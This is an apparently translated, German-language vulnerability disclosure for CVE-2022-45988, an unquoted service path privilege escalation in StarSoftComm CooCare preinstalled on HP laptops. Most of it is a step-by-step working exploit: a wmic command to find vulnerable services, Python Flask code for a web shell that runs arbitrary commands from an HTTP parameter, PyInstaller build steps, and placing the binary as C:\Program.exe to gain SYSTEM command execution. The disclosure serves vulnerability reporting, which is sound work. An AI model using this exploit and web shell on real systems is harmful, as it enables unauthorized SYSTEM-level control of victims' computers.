
CVE-2022-45988 StarSoftComm HP CooCare Es existiert eine Schwachstelle zur Erhöhung von Berechtigungen.
####################################################
Ich habe hp-security-alert kontaktiert. Sie haben diesen Fehler behoben. Betreff: StarSoftComm CooCare [HP-PSRT-IR #4106]
Der Anbieter antwortete mit den folgenden Informationen:
Befolgen Sie diese Schritte zum Aktualisieren:
#####################################
In StarSoftComm HP CooCare besteht eine Schwachstelle zur Erhöhung von Privilegien, die es einem Angreifer ermöglichen könnte, seine Privilegienstufe zu erhöhen. e管家超级版 ist eine mitgelieferte Fernwartungssoftware des HP Star 14 pro und ein Produkt von StarSoftComm (Ruan Tong Technology).
Getestet auf Windows 11 22621.819, HP LAPTOP HP Pavilion Plus 14 Laptop 14-eh0000 (56D77AV)
Betroffene Version: CooCare unter v5.364
#Reproduktion der Schwachstelle
#Der erste Schritt: wmic service get name,displayname,pathname,startmode |findstr /i "Auto" |findstr /i /v "C:\Windows\" |findstr /i /v """ Finden Sie den Dienst (Verwenden Sie den obigen CMD-Befehl, um den nicht referenzierten Dienst zu finden).

Der Dienstname ist Windows Application Management Service, auch bekannt als WinAppMgmt. Der Dienst heißt Windows Application Management Service, abgekürzt WinAppMgmt.

Der Dienst stammt von StarSoftComm CooCare.

#Schritt 2: Ein schädliches Programm vorbereiten

from flask import Flask, request
import os
app = Flask(__name__)
@app.route('/')
def hello_world():
r = request.args.getlist('cmd') #Reception? cmd= parameter
a=os.popen(r[0]) #Execute system commands
l = a.read()
return l #return
if __name__ == '__main__':
app.run(host='0.0.0.0', port=14145, debug=True) #Listen HTTP port 14145
Ich habe Python3 Flask verwendet, um eine schädliche EXE zu schreiben. Sie kann den HTTP-Port 14145 abhören und Systembefehle ausführen.
Mit den Befehlen pyinstaller.exe --onefile --windowed -F -w python_test.py eine schädliche EXE erstellen.
#Schritt 3: Schadsoftware in Pfad C:\ legen und in Program.exe umbenennen

#Schritt 4: Starten Sie den Windows Application Management Service
Falls der Windows Application Management Service bereits gestartet ist, können Sie ihn neu starten.

#Schritt 5: Warten Sie, bis der Windows Application Management Service startet, und führen Sie die Systembefehle aus C:\Program.exe wird als System ausgeführt.
Wenn ich sehe, dass der Windows Application Management Service in Taskmgr.exe als SYSTEM läuft, kann ich den Browser öffnen und http://127.0.0.1:14145?cmd=whoami eingeben.
Warten..........
auf...
es.
NT SYSTEM
